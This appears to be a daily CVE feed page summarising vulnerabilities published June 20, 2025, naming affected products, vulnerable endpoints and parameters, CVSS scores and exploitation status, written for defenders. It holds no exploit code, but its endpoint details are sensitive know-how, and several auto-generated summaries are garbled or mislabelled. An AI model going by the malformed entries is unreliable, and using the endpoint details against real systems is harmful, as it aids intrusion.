THREAT ALERT

Daily vulnerability intelligence for defenders – fresh CVEs with exploitability signals, patch status, and action-oriented priorities from 17 sources.

CVEs published

Track vulnerabilities that matter to your stack

Personalized alerts, dashboards, and weekly digests – free.

Trending Now

Critical Watch

Attack Technique Trend

Prediction based on ZDI Disclosures & CVE data · 30 days

Analytics

Vendor Today – Quick Filter

Techniques

results

Sort:

Base Score

Vector String

Attack Vector (AV)

Attack Complexity (AC)

Privileges Required (PR)

User Interaction (UI)

Scope (S)

Confidentiality (C)

Integrity (I)

Availability (A)

0 | 3.9| 6.9| 8.9| 10

NONE LOW MEDIUM HIGH CRITICAL

CVSS Filter – CVEs match

No CVEs match the selected criteria

Browse older vulnerabilities in Archive

Live Feed auto-refresh 60s

Vulnerability Intelligence — June 20, 2025

222 CVEs tracked today. 15 Critical, 86 High, 110 Medium, 11 Low.

CVE-2025-49132 CRITICAL CVSS 10.0
Pterodactyl game server management panel prior to version 1.11.11 contains an unauthenticated remote code execution via the /locales/locale.json endpoint. By manipulating the locale and namespace query parameters, attackers can execute arbitrary code on the panel server, gaining control over all managed game servers.

RCE
CVE-2025-25038 CRITICAL CVSS 9.8
MiniDVBLinux version 5.4 and earlier contains an unauthenticated OS command injection in the web-based management interface. The DVB streaming platform fails to sanitize user input before passing it to operating system commands, enabling remote attackers to execute arbitrary commands on the media server.

Command Injection Minidvblinux
CVE-2025-25034 CRITICAL CVSS 9.3
SugarCRM versions prior to 6.5.24, 6.7.13, 7.5.2.5, 7.6.2.2, and 7.7.1.0 contain a PHP object injection vulnerability via the SugarRestSerialize.php script. The rest_data parameter is passed to unserialize() without validation, allowing unauthenticated attackers to inject malicious PHP objects for remote code execution.

Deserialization PHP RCE
CVE-2025-48706 CRITICAL CVSS 9.1
A remote code execution vulnerability in COROS PACE 3 (CVSS 9.1). Risk factors: public PoC available.

Buffer Overflow Coros Pace 3 Firmware
CVE-2025-46179 CRITICAL CVSS 9.8
CVE-2025-46179 is a critical SQL injection vulnerability in CloudClassroom-PHP Project v1.0's askquery.php file, where the 'squeryx' parameter is passed directly into SQL queries without sanitization. This affects all installations of CloudClassroom-PHP v1.0 and allows unauthenticated remote attackers to execute arbitrary SQL commands, potentially leading to complete database compromise including data exfiltration, modification, and denial of service. The vulnerability has a CVSS 9.8 score reflecting its network-based exploitability with no authentication or user interaction required; active exploitation status and POC availability are unknown from the provided data.

PHP SQLi Cloudclassroom Php Project
CVE-2025-45890 CRITICAL CVSS 9.8
CVE-2025-45890 is a critical directory traversal vulnerability in Novel Plus before v5.1.0 that allows unauthenticated remote attackers to execute arbitrary code by manipulating the filePath parameter. The vulnerability has a CVSS score of 9.8 (critical severity) with a network-based attack vector requiring no privileges or user interaction. Given the critical CVSS metrics and remote code execution capability, this vulnerability poses an immediate and severe risk to all unpatched Novel Plus installations and warrants emergency patching.

RCE Path Traversal Novel Plus
CVE-2025-44635 CRITICAL CVSS 9.8
CVE-2025-44635 is a security vulnerability (CVSS 9.8). Critical severity with potential for significant impact on affected systems.

Authentication Bypass
CVE-2025-34030 CRITICAL CVSS 10.0
CVE-2025-34030 is a critical OS command injection vulnerability in sar2html versions 3.2.2 and earlier that allows unauthenticated remote attackers to execute arbitrary shell commands through unsanitized input in the 'plot' parameter of index.php. The vulnerability has a perfect CVSS score of 10.0 and requires no authentication, user interaction, or special privileges to exploit. Active exploitation was observed by the Shadowserver Foundation as of February 4, 2025, indicating this is not a theoretical threat.

PHP Command Injection
CVE-2025-34022 CRITICAL CVSS 9.3
CVE-2025-34022 is an unauthenticated path traversal vulnerability in Selea Targa IP OCR-ANPR cameras affecting at least 9 models (iZero, Targa 512, Targa 504, Targa Semplice, Targa 704 TKM, Targa 805, Targa 710 INOX, Targa 750, Targa 704 ILB). The /common/get_file.php script fails to validate the 'file' parameter, allowing remote attackers to read arbitrary files including system credentials in cleartext. Active exploitation was confirmed by Shadowserver Foundation on 2025-02-02 UTC, indicating this is not theoretical-it is actively weaponized in the wild.

PHP Authentication Bypass Path Traversal Information Disclosure
CVE-2025-32880 CRITICAL CVSS 9.8
COROS PACE 3 smartwatches through firmware version 3.0808.0 download firmware updates over unencrypted HTTP connections when connected to WLAN, enabling attackers to intercept, modify, or inject malicious firmware without authentication. This critical vulnerability (CVSS 9.8) affects all users of the PACE 3 device and could result in complete device compromise, data exfiltration, or persistent malware installation. No active exploitation in the wild has been confirmed at this time, but the trivial attack complexity and network accessibility make this a high-priority patch target.

Information Disclosure Coros Pace 3 Firmware
CVE-2025-32878 CRITICAL CVSS 9.8
CVE-2025-32878 is a security vulnerability (CVSS 9.8). Risk factors: public PoC available.

Information Disclosure Coros Pace 3 Firmware
CVE-2025-32877 CRITICAL CVSS 9.8
CVE-2025-32877 is a security vulnerability (CVSS 9.8) that allows attackers. Risk factors: public PoC available.

Information Disclosure Coros Pace 3 Firmware
CVE-2025-25037 CRITICAL CVSS 9.3
CVE-2025-25037 is a critical authentication bypass vulnerability in Aquatronica Controller System that exposes an unauthenticated tcp.php endpoint, allowing remote attackers to retrieve plaintext administrative credentials and sensitive system configuration data without authentication. Affected versions include firmware ≤5.1.6 and web interface ≤2.0. Successful exploitation enables complete system compromise, including unauthorized control of connected aquarium devices and manipulation of critical parameters, representing a direct path to full administrative access with no user interaction required.

PHP Information Disclosure
CVE-2025-4981 CRITICAL CVSS 9.9
A remote code execution vulnerability (CVSS 9.9) that allows authenticated users. Critical severity with potential for significant impact on affected systems.

RCE Path Traversal Mattermost Server Suse
CVE-2024-53298 CRITICAL CVSS 9.8
CVE-2024-53298 is a critical missing authorization vulnerability in Dell PowerScale OneFS NFS export functionality that allows unauthenticated remote attackers to gain unauthorized filesystem access without authentication. Affected versions range from 9.5.0.0 through 9.10.0.1, and successful exploitation enables arbitrary file read, modification, and deletion, leading to complete system compromise. With a CVSS score of 9.8 and network-based attack vector requiring no privileges or user interaction, this vulnerability poses severe risk to unpatched Dell PowerScale deployments; KEV status and active exploitation details require vendor advisory verification.

Authentication Bypass Dell Powerscale Onefs
CVE-2025-52825 HIGH CVSS 8.8
A privilege escalation vulnerability in Rameez Iqbal Real Estate Manager allows Privilege Escalation (CVSS 8.8). High severity vulnerability requiring prompt remediation.

CSRF Privilege Escalation
CVE-2025-52822 HIGH CVSS 8.5
CVE-2025-52822 is an SQL injection vulnerability in Iqonic Design's WP Roadmap WordPress plugin (versions up to 2.1.3) that allows authenticated attackers to execute arbitrary SQL commands. An attacker with user-level privileges can exploit this via network access without user interaction to read sensitive database contents and cause denial of service. The vulnerability has not been confirmed as actively exploited in the wild, but the high CVSS score (8.5) and low attack complexity indicate this should be treated as a priority for affected WordPress installations.

SQLi
CVE-2025-52821 HIGH CVSS 8.5
CVE-2025-52821 is a SQL Injection vulnerability in thanhtungtnt Video List Manager versions up to 1.7 that allows authenticated attackers to execute arbitrary SQL commands. The vulnerability has a CVSS score of 8.5 with high confidentiality impact and cross-site scope implications, meaning successful exploitation could lead to unauthorized data access and potential lateral movement within affected systems. While the attack requires valid credentials (PR:L), the network accessibility and low attack complexity make this a significant risk for organizations using this plugin.

SQLi PHP
CVE-2025-52802 HIGH CVSS 7.5
CVE-2025-52802 is a security vulnerability (CVSS 7.5). High severity vulnerability requiring prompt remediation.

Authentication Bypass WordPress PHP
CVE-2025-52795 HIGH CVSS 7.1
CVE-2025-52795 is a Cross-Site Request Forgery (CSRF) vulnerability in the aharonyan WP Front User Submit / Front Editor WordPress plugin (versions up to 4.9.4) that allows unauthenticated attackers to perform unauthorized actions on behalf of authenticated users. The vulnerability has a CVSS score of 7.1 with high availability impact, enabling attackers to modify or delete user-submitted content through malicious web requests without user consent.

CSRF WordPress PHP
CVE-2025-52794 HIGH CVSS 7.1
CVE-2025-52794 is a Cross-Site Request Forgery (CSRF) vulnerability in Creative-Solutions Creative Contact Form (versions up to 1.0.0) that enables Stored XSS attacks. An unauthenticated attacker can craft malicious requests to inject persistent JavaScript payloads through contact form submissions, affecting any user who views the contaminated form data. The vulnerability has a CVSS score of 7.1 (High) with network-based attack vector and low attack complexity, making it readily exploitable in typical web deployments.

CSRF XSS
CVE-2025-52793 HIGH CVSS 7.1
CVE-2025-52793 is a Cross-Site Request Forgery (CSRF) vulnerability in Esselink.nu Settings that enables reflected Cross-Site Scripting (XSS) attacks. The vulnerability affects Esselink.nu Settings versions up to and including 2.94, allowing unauthenticated remote attackers to perform actions on behalf of users and inject malicious scripts with minimal user interaction. With a CVSS score of 7.1 and network-based attack vector, this vulnerability poses a moderate-to-significant risk to affected installations, particularly if actively exploited or if public proof-of-concept code becomes available.

CSRF XSS
CVE-2025-52792 HIGH CVSS 7.1
CVE-2025-52792 is a Cross-Site Request Forgery (CSRF) vulnerability in the vgstef WP User Stylesheet Switcher WordPress plugin (versions up to v2.2.0) that enables Stored XSS attacks. An unauthenticated attacker can exploit this via a simple network request with user interaction to inject malicious scripts that execute in victims' browsers, potentially compromising user sessions and data. The vulnerability has not been confirmed as actively exploited in the wild, though the high CVSS score (7.1) and network-accessible attack vector indicate practical exploitability.

CSRF XSS WordPress PHP
CVE-2025-52791 HIGH CVSS 7.1
CVE-2025-52791 is a CSRF vulnerability in devfelixmoira Knowledge Base Maker (versions up to 1.1.8) that enables Stored XSS attacks, allowing unauthenticated remote attackers to inject malicious scripts that persist and execute in users' browsers. The vulnerability requires user interaction (clicking a malicious link) but can affect multiple users through stored payloads, with a CVSS score of 7.1 indicating medium-high severity. No KEV listing or confirmed EPSS data is available in public sources, and patch availability status requires verification with the vendor.

CSRF XSS
CVE-2025-52790 HIGH CVSS 7.1
CVE-2025-52790 is a CSRF vulnerability in the r-win WP-DownloadCounter WordPress plugin (versions through 1.01) that enables Stored XSS attacks. An attacker can craft malicious requests that, when clicked by an administrator, inject persistent JavaScript into the plugin's data storage, affecting all site visitors. The CVSS 7.1 score reflects moderate severity with network-based attack delivery and user interaction requirements, though the actual exploitability and active exploitation status require verification against KEV and EPSS data.

CSRF XSS WordPress PHP
CVE-2025-52789 HIGH CVSS 7.1
A cross-site scripting vulnerability in George Lewe Lewe ChordPress allows Stored XSS (CVSS 7.1). High severity vulnerability requiring prompt remediation.

CSRF XSS
CVE-2025-52784 HIGH CVSS 7.1
CVE-2025-52784 is a Cross-Site Request Forgery (CSRF) vulnerability in hideoguchi Bluff Post that enables Stored XSS attacks, affecting versions through 1.1.1. An unauthenticated attacker can craft malicious requests to inject persistent JavaScript payloads that execute in victims' browsers when they view affected content, potentially leading to session hijacking, credential theft, or defacement. The vulnerability has a CVSS score of 7.1 (High) with network-based attack vector and low complexity, indicating moderate real-world risk.

CSRF XSS
CVE-2025-52783 HIGH CVSS 7.1
A remote code execution vulnerability in themelocation Change Cart button Colors WooCommerce allows Stored XSS (CVSS 7.1). High severity vulnerability requiring prompt remediation.

WordPress CSRF XSS Woocommerce PHP
CVE-2025-52782 HIGH CVSS 7.1
CVE-2025-52782 is a Reflected Cross-Site Scripting (XSS) vulnerability in King Rayhan Scroll UP WordPress plugin versions through 2.0 that allows unauthenticated attackers to inject malicious scripts into web pages viewed by users. The vulnerability has a CVSS score of 7.1 (High) with network-based attack vector requiring user interaction; attackers can steal session cookies, perform actions on behalf of users, or redirect users to malicious sites. KEV status and active exploitation data were not provided in available intelligence sources, though the reflected XSS nature suggests moderate real-world exploitability.

XSS
CVE-2025-52781 HIGH CVSS 7.1
CVE-2025-52781 is a Cross-Site Request Forgery (CSRF) vulnerability in Beee TinyNav versions up to 1.4 that enables Stored XSS attacks. An unauthenticated attacker can craft malicious requests to inject persistent JavaScript payloads into the application, which are then executed in the browsers of other users who interact with the compromised content. With a CVSS score of 7.1 and network-based attack vector requiring only user interaction, this vulnerability poses a moderate-to-significant risk to affected deployments, particularly if actively exploited in the wild or publicly disclosed with proof-of-concept code.

CSRF XSS
CVE-2025-52780 HIGH CVSS 7.1
CVE-2025-52780 is a CSRF vulnerability in Mohammad Parsa Logo Manager For Samandehi (versions through 0.5) that enables Stored XSS attacks, allowing unauthenticated attackers to perform unauthorized actions and inject malicious scripts affecting other users. The vulnerability has a CVSS score of 7.1 (High) and exploits weak CSRF protections in an admin/management plugin, with the attack requiring user interaction (UI:R) but affecting multiple users via stored payload persistence.

CSRF XSS
CVE-2025-52772 HIGH CVSS 7.1
CVE-2025-52772 is a CSRF vulnerability in Adnan Haque's Virtual Moderator plugin (versions through 1.4) that enables Cross-Site Scripting (XSS) attacks. An unauthenticated attacker can exploit this via a malicious webpage to perform unauthorized actions and inject malicious scripts, potentially compromising user sessions and data. With a CVSS score of 7.1 and network-accessible attack vector requiring only user interaction, this vulnerability poses a moderate-to-significant risk to affected installations, though exploitation requires social engineering to trick users into visiting attacker-controlled sites.

CSRF XSS
CVE-2025-52715 HIGH CVSS 7.5
CVE-2025-52715 is a PHP Local File Inclusion (LFI) vulnerability in RadiusTheme's Classified Listing plugin that allows authenticated attackers to include and execute arbitrary local files through improper filename validation in PHP include/require statements. The vulnerability affects Classified Listing versions up to 4.2.0, and while the CVSS score of 7.5 indicates high severity, exploitation requires local authentication and non-standard attack complexity, suggesting moderate real-world risk absent evidence of active exploitation or public proof-of-concept.

PHP Information Disclosure
CVE-2025-52708 HIGH CVSS 7.5
CVE-2025-52708 is a PHP Local File Inclusion (LFI) vulnerability in RealMag777 HUSKY versions up to 1.3.7, stemming from improper control of filenames in include/require statements. An authenticated attacker with low-to-medium privilege requirements can exploit this remotely to read arbitrary files from the server filesystem, potentially leading to information disclosure, code execution, or system compromise. The CVSS 7.5 score and requirement for authenticated access (PR:L) suggest moderate real-world risk; active exploitation status and POC availability are not confirmed from available data, but the vulnerability class (CWE-98 RFI/LFI) is historically high-value for attackers.

PHP Lfi Code Injection
CVE-2025-49873 HIGH CVSS 7.1
CVE-2025-49873 is a Reflected Cross-Site Scripting (XSS) vulnerability in NasaTheme's Elessi WordPress theme that allows unauthenticated attackers to inject malicious scripts into web pages viewed by victims. Versions up to and including 6.3.9 are affected. An attacker can steal session cookies, perform actions on behalf of users, or redirect users to malicious sites with minimal complexity (network-accessible input, user interaction required). The vulnerability lacks confirmed EPSS data and KEV listing at this time, but the CVSS 7.1 score and reflected XSS nature indicate moderate-to-high priority.

XSS
CVE-2025-49715 HIGH CVSS 7.5
CVE-2025-49715 is a private personal information disclosure vulnerability in Microsoft Dynamics 365 FastTrack Implementation Assets that allows unauthenticated network-based attackers to access sensitive user data without any user interaction. The vulnerability has a CVSS score of 7.5 (High) with confirmed high confidentiality impact, and affects organizations using Dynamics 365 FastTrack resources. Given the network-accessible nature and lack of authentication requirements, this poses significant risk to enterprise customer data security.

Information Disclosure Microsoft Dynamics 365
CVE-2025-48945 HIGH CVSS 8.2
pycares versions prior to 4.9.0 contain a use-after-free vulnerability (CWE-416) in the Channel object that crashes the Python interpreter when garbage collection occurs during pending DNS queries. This denial-of-service vulnerability affects any application using pycares for asynchronous DNS resolution; attackers can trigger interpreter crashes by manipulating DNS query timing, though no active exploitation or public POC is documented. The CVSS 8.2 score reflects high availability impact, but real-world exploitability is limited by the requirement for application-level DNS query patterns and Python garbage collection timing.

Use After Free Python Denial Of Service Redhat Suse
CVE-2025-48705 HIGH CVSS 7.5
CVE-2025-48705 is a NULL pointer dereference vulnerability in COROS PACE 3 smartwatch (versions 3.0 through 3.0808.0) that allows unauthenticated remote attackers to trigger a device reboot by sending a specially crafted Bluetooth Low Energy (BLE) message. The vulnerability results in denial of service with no additional privileges required, affecting the availability of the device. Given the CVSS 7.5 score and remote/network attack vector over BLE, this poses a significant nuisance risk to users, though impact is limited to device unavailability rather than data compromise.

Denial Of Service Coros Pace 3 Firmware
CVE-2025-47771 HIGH CVSS 8.1
PowSyBl versions 6.3.0 through 6.7.1 contain an unsafe deserialization vulnerability in the SparseMatrix.read() method that allows remote attackers to achieve arbitrary code execution and privilege escalation without authentication or user interaction. The vulnerability affects the powsybl-math library, a core component of the Power System Blocks framework used in power grid management software. Exploitation requires only network access to an application exposing the vulnerable deserialization method.

Deserialization
CVE-2025-45331 HIGH CVSS 7.5
CVE-2025-45331 is a Null Pointer Dereference (NPD) vulnerability in brplot v420.69.1's br_dagens_handle_once function that causes denial of service through segmentation faults and program crashes. The vulnerability is remotely exploitable without authentication or user interaction (CVSS 7.5), making it a high-availability risk for any system processing brplot data. While KEV status and active exploitation data are not provided, the network-accessible attack vector and high availability impact suggest this warrants prioritization for patched deployments.

Denial Of Service Brplot
CVE-2025-44203 HIGH CVSS 7.5
CVE-2025-44203 is a critical information disclosure vulnerability in HotelDruid 3.0.7 that allows unauthenticated attackers to extract sensitive database credentials (administrator username, password hash, and salt) through verbose SQL error messages on the creadb.php endpoint. The vulnerability can also cause denial of service conditions that lock administrators out of the system. With a CVSS score of 7.5 and no authentication required, this poses an immediate threat to unpatched HotelDruid installations.

PHP Denial Of Service Hoteldruid
CVE-2025-34029 HIGH CVSS 8.8
CVE-2025-34029 is an OS command injection vulnerability in Edimax EW-7438RPn Mini wireless router firmware version 1.13 and prior that allows authenticated remote attackers to execute arbitrary shell commands as root through the /goform/formSysCmd endpoint. The vulnerability has a CVSS score of 8.8 (High) and was observed being exploited in the wild by the Shadowserver Foundation on 2024-09-14 UTC, indicating active real-world attack activity against this widely-deployed consumer networking device.

Command Injection Ew 7438rpn Mini Firmware
CVE-2025-34024 HIGH CVSS 8.8
CVE-2025-34024 is an OS command injection vulnerability in Edimax EW-7438RPn wireless range extender firmware versions 1.13 and prior, allowing authenticated attackers to execute arbitrary commands as root via the /goform/mp endpoint. The vulnerability results from improper input validation on the 'command' parameter in the mp.asp form handler, enabling shell metacharacter injection. Active exploitation was observed by the Shadowserver Foundation on 2024-09-14 UTC, indicating real-world threat activity against this device.

Command Injection Ew 7438rpn Mini Firmware
CVE-2025-34023 HIGH CVSS 8.5
CVE-2025-34023 is a path traversal vulnerability in Karel IP1211 IP Phone's web management panel that allows remote authenticated attackers to read arbitrary files from the underlying system via unsanitized input to the /cgi-bin/cgiServer.exx endpoint's page parameter. This vulnerability affects IP phone administrators with network access to the management interface and carries a CVSS 8.5 score reflecting high confidentiality impact. Active exploitation evidence was documented by Shadowserver Foundation on 2025-02-02 UTC, indicating real-world attack activity.

Path Traversal Information Disclosure IoT
CVE-2025-34021 HIGH CVSS 7.8
CVE-2025-34021 is a critical Server-Side Request Forgery (SSRF) vulnerability affecting multiple Selea Targa IP OCR-ANPR camera models that allows remote unauthenticated attackers to induce arbitrary HTTP requests through unvalidated JSON POST parameters (ipnotify_address and url). An attacker can bypass firewall policies, enumerate internal services, or redirect image fetch and DNS lookup operations to internal or external systems of their choosing. Active exploitation was confirmed by the Shadowserver Foundation on 2025-01-25, indicating real-world attack activity and operational risk.

SSRF
CVE-2025-32879 HIGH CVSS 8.8
CVE-2025-32879 is a security vulnerability (CVSS 8.8) that allows an attacker. Risk factors: public PoC available.

Authentication Bypass Bluetooth Information Disclosure Coros Pace 3 Firmware
CVE-2025-6372 HIGH CVSS 8.8
A buffer overflow vulnerability (CVSS 8.8). Risk factors: public PoC available.

Buffer Overflow D-Link RCE Dir 619l Firmware
CVE-2025-6371 HIGH CVSS 8.8
CVE-2025-6371 is a critical stack-based buffer overflow vulnerability in D-Link DIR-619L firmware version 2.06B01 affecting the formSetEnableWizard function. An authenticated remote attacker can exploit this vulnerability by manipulating the 'curTime' parameter to achieve remote code execution with high confidentiality, integrity, and availability impact (CVSS 8.8). Exploitation has been publicly disclosed with proof-of-concept available, and this vulnerability only affects end-of-life products no longer receiving vendor support.

Buffer Overflow D-Link Stack Overflow RCE Dir 619l Firmware
CVE-2025-6370 HIGH CVSS 8.8
A buffer overflow vulnerability in A vulnerability classified as critical (CVSS 8.8). Risk factors: public PoC available.

Buffer Overflow D-Link RCE Dir 619l Firmware
CVE-2025-6369 HIGH CVSS 8.8
CVE-2025-6369 is a critical stack-based buffer overflow vulnerability in D-Link DIR-619L v2.06B01 affecting the /goform/formdumpeasysetup endpoint. An authenticated remote attacker can exploit improper input validation of the curTime or config.save_network_enabled parameters to achieve remote code execution with high impact on confidentiality, integrity, and availability. Public exploit code exists for this vulnerability, and the affected product is end-of-life with no vendor support available.

Buffer Overflow D-Link RCE Dir 619l Firmware
CVE-2025-6368 HIGH CVSS 8.8
A critical stack-based buffer overflow vulnerability exists in D-Link DIR-619L firmware version 2.06B01, affecting the formSetEmail function via the curTime and config.smtp_email_subject parameters. An authenticated remote attacker can exploit this vulnerability to achieve arbitrary code execution with full system compromise (confidentiality, integrity, and availability). Public exploit code has been disclosed, and the affected product is end-of-life with no vendor support available.

Buffer Overflow D-Link RCE Dir 619l Firmware
CVE-2025-6367 HIGH CVSS 8.8
CVE-2025-6367 is a critical stack-based buffer overflow vulnerability in D-Link DIR-619L firmware version 2.06B01, affecting the /goform/formSetDomainFilter endpoint. An authenticated remote attacker can exploit improper input validation on the curTime, sched_name_%d, and url_%d parameters to achieve arbitrary code execution with full system compromise (confidentiality, integrity, and availability). The vulnerability has public exploit disclosure and affects end-of-life hardware no longer receiving vendor support.

Buffer Overflow D-Link RCE Dir 619l Firmware
CVE-2025-6364 HIGH CVSS 7.3
A SQL injection vulnerability in A vulnerability (CVSS 7.3). Risk factors: public PoC available.

PHP SQLi Simple Pizza Ordering System
CVE-2025-6363 HIGH CVSS 7.3
CVE-2025-6363 is a critical SQL injection vulnerability in code-projects Simple Pizza Ordering System version 1.0, specifically in the /adding-exec.php file where the 'ingname' parameter is improperly sanitized. An unauthenticated remote attacker can exploit this vulnerability to execute arbitrary SQL queries, potentially leading to unauthorized data access, modification, or deletion of database records. With a CVSS score of 7.3 and network-based attack vector requiring no user interaction, this vulnerability poses significant risk to affected deployments, though real-world exploitation likelihood depends on whether POC code and active exploitation attempts are documented.

PHP SQLi Remote Code Execution Simple Pizza Ordering System
CVE-2025-6362 HIGH CVSS 7.3
CVE-2025-6362 is a critical SQL injection vulnerability in code-projects Simple Pizza Ordering System version 1.0, specifically in the /editpro.php file where the ID parameter is improperly validated. An unauthenticated remote attacker can exploit this vulnerability to execute arbitrary SQL queries, potentially leading to unauthorized data access, modification, or system compromise. The vulnerability has a CVSS score of 7.3 (High) and requires no user interaction or authentication, making it a significant risk for deployments of this application.

PHP SQLi Simple Pizza Ordering System
CVE-2025-6361 HIGH CVSS 7.3
CVE-2025-6361 is a critical SQL injection vulnerability in code-projects Simple Pizza Ordering System version 1.0, affecting the /adds.php file's userid parameter. An unauthenticated remote attacker can exploit this vulnerability without user interaction to execute arbitrary SQL queries, potentially leading to unauthorized data access, modification, or deletion of the application database. The vulnerability has a CVSS score of 7.3 (High) and represents an immediate risk to any organization running this unpatched system in production.

PHP SQLi Simple Pizza Ordering System
CVE-2025-6360 HIGH CVSS 7.3
CVE-2025-6360 is a critical SQL injection vulnerability in code-projects Simple Pizza Ordering System version 1.0, affecting the /portal.php file's ID parameter. An unauthenticated remote attacker can exploit this to execute arbitrary SQL commands, potentially compromising data confidentiality, integrity, and availability. The vulnerability has been publicly disclosed with exploit code available, increasing real-world exploitation risk.

PHP SQLi Remote Code Execution Simple Pizza Ordering System
CVE-2025-6359 HIGH CVSS 7.3
CVE-2025-6359 is a critical SQL injection vulnerability in code-projects Simple Pizza Ordering System version 1.0, specifically in the /cashconfirm.php file where the 'transactioncode' parameter is unsanitized. An unauthenticated remote attacker can exploit this to execute arbitrary SQL queries, potentially leading to unauthorized data access, modification, or deletion. The vulnerability has been publicly disclosed with exploit code available, increasing real-world exploitation risk.

PHP SQLi Simple Pizza Ordering System
CVE-2025-6358 HIGH CVSS 7.3
CVE-2025-6358 is a critical SQL injection vulnerability in code-projects Simple Pizza Ordering System version 1.0, affecting the /saveorder.php file's ID parameter. An unauthenticated remote attacker can exploit this vulnerability to execute arbitrary SQL queries, potentially leading to unauthorized data access, modification, and system disruption. Public proof-of-concept code is available, increasing the immediate risk of active exploitation.

PHP SQLi Simple Pizza Ordering System
CVE-2025-6357 HIGH CVSS 7.3
CVE-2025-6357 is a critical SQL injection vulnerability in code-projects Simple Pizza Ordering System version 1.0, specifically in the /paymentportal.php file where the 'person' parameter is not properly sanitized. An unauthenticated remote attacker can exploit this vulnerability with no user interaction required to execute arbitrary SQL commands, potentially leading to unauthorized data access, modification, or deletion of database contents. The vulnerability has been publicly disclosed with proof-of-concept code available, increasing the likelihood of active exploitation.

PHP SQLi Remote Code Execution Simple Pizza Ordering System
CVE-2025-6356 HIGH CVSS 7.3
CVE-2025-6356 is a critical SQL injection vulnerability in code-projects Simple Pizza Ordering System version 1.0, specifically in the /addmem.php file that allows unauthenticated remote attackers to manipulate database queries. An attacker can exploit this vulnerability to read, modify, or delete sensitive data from the underlying database. The vulnerability has public exploit code available and may be actively exploited in the wild.

PHP SQLi Simple Pizza Ordering System
CVE-2025-6355 HIGH CVSS 7.3
CVE-2025-6355 is a critical SQL injection vulnerability in SourceCodester Online Hotel Reservation System version 1.0, specifically in the /admin/execeditroom.php file where the 'userid' parameter is improperly sanitized. An unauthenticated remote attacker can exploit this vulnerability to inject arbitrary SQL commands, potentially leading to unauthorized data access, modification, or denial of service. Public disclosure and proof-of-concept availability significantly elevate real-world exploitation risk.

PHP SQLi Online Hotel Reservation System
CVE-2025-6354 HIGH CVSS 7.3
CVE-2025-6354 is a critical SQL injection vulnerability in code-projects Online Shoe Store 1.0 affecting the customer signup functionality (/function/customer_signup.php). An unauthenticated remote attacker can manipulate the email parameter to inject arbitrary SQL commands, potentially leading to unauthorized data access, modification, or deletion. The vulnerability has been publicly disclosed with proof-of-concept availability and demonstrates active exploitation potential.

PHP SQLi Online Shoe Store
CVE-2025-6344 HIGH CVSS 7.3
CVE-2025-6344 is a critical SQL injection vulnerability in code-projects Online Shoe Store version 1.0, specifically in the /contactus.php file's email parameter. An unauthenticated remote attacker can exploit this vulnerability to execute arbitrary SQL commands, potentially leading to unauthorized data access, modification, or deletion. Public disclosure and exploit code availability increase the real-world threat level significantly.

PHP SQLi Online Shoe Store
CVE-2025-6343 HIGH CVSS 7.3
CVE-2025-6343 is a critical SQL injection vulnerability in code-projects Online Shoe Store version 1.0, specifically in the /admin/admin_product.php file where the 'pid' parameter is not properly sanitized. An unauthenticated remote attacker can exploit this vulnerability to execute arbitrary SQL queries, potentially leading to unauthorized data access, modification, or deletion of the shoe store's database. The exploit has been publicly disclosed with proof-of-concept code available, significantly increasing real-world exploitation risk.

PHP SQLi Online Shoe Store
CVE-2025-6342 HIGH CVSS 7.3
CVE-2025-6342 is a critical SQL injection vulnerability in code-projects Online Shoe Store 1.0, specifically in the /admin/admin_football.php file where the 'pid' parameter is inadequately sanitized. An unauthenticated remote attacker can exploit this to execute arbitrary SQL queries, potentially leading to unauthorized data access, modification, or deletion. The vulnerability has been publicly disclosed with exploit code available, making it actively exploitable in the wild.

PHP SQLi Online Shoe Store
CVE-2025-6339 HIGH CVSS 7.3
A SQL injection vulnerability in A vulnerability (CVSS 7.3). Risk factors: public PoC available.

PHP SQLi Hospital Management System
CVE-2025-6337 HIGH CVSS 8.8
CVE-2025-6337 is a critical buffer overflow vulnerability in TOTOLINK A3002R and A3002RU routers affecting versions 3.0.0-B20230809.1615 and 4.0.0-B20230531.1404. An authenticated attacker can exploit the 'submit-url' parameter in the /boafrm/formTmultiAP HTTP POST handler to achieve remote code execution with complete system compromise (confidentiality, integrity, and availability). Public exploit code exists and the vulnerability is exploitable over the network with low complexity.

Buffer Overflow TP-Link A3002ru Firmware A3002r Firmware TOTOLINK
CVE-2025-6336 HIGH CVSS 8.8
CVE-2025-6336 is a critical buffer overflow vulnerability in TOTOLINK EX1200T wireless router (version 4.1.2cu.5232_B20210713) affecting the HTTP POST request handler. An authenticated attacker can exploit improper input validation on the 'submit-url' parameter in the /boafrm/formTmultiAP endpoint to achieve remote code execution with full system compromise (confidentiality, integrity, and availability). Public exploit code is available and the vulnerability has been disclosed; exploitation requires valid credentials but no user interaction.

Buffer Overflow TP-Link RCE Ex1200t Firmware TOTOLINK
CVE-2025-6334 HIGH CVSS 8.8
CVE-2025-6334 is a critical stack-based buffer overflow vulnerability in D-Link DIR-867 1.0 routers, affecting the Query String Handler's strncpy function implementation. Remote attackers with low privileges can exploit this vulnerability to achieve complete system compromise including confidentiality, integrity, and availability breaches. The vulnerability has documented public exploits available, affects end-of-life hardware no longer receiving vendor support, and carries a high CVSS 3.1 score of 8.8.

Buffer Overflow D-Link RCE Remote Code Execution Dir 867 Firmware
CVE-2025-6330 HIGH CVSS 7.3
CVE-2025-6330 is a critical SQL injection vulnerability in PHPGurukul Directory Management System version 1.0, specifically in the /searchdata.php file's 'searchdata' parameter. An unauthenticated remote attacker can inject arbitrary SQL commands to compromise confidentiality, integrity, and availability of the underlying database. Public disclosure and proof-of-concept exploitation have occurred, making this an immediately actionable threat despite the moderate CVSS 7.3 score.

PHP SQLi Directory Management System
CVE-2025-6328 HIGH CVSS 8.8
A critical stack-based buffer overflow vulnerability exists in D-Link DIR-815 firmware version 1.01 within the hedwig.cgi module (function sub_403794), allowing remote attackers with low privilege access to execute arbitrary code with high impact on confidentiality, integrity, and availability. Public exploit code is available and the vulnerability may be actively exploited in the wild, making this a high-priority remediation target.

Buffer Overflow D-Link RCE Dir 815 Firmware
CVE-2025-6323 HIGH CVSS 7.3
CVE-2025-6323 is a critical SQL injection vulnerability in PHPGurukul Pre-School Enrollment System version 1.0, specifically affecting the /enrollment.php file's 'fathername' parameter. An unauthenticated remote attacker can exploit this to execute arbitrary SQL queries, potentially leading to unauthorized data access, modification, or deletion of the enrollment database. The vulnerability has public proof-of-concept code available and may be actively exploited in the wild.

PHP SQLi Pre School Enrollment System
CVE-2025-6322 HIGH CVSS 7.3
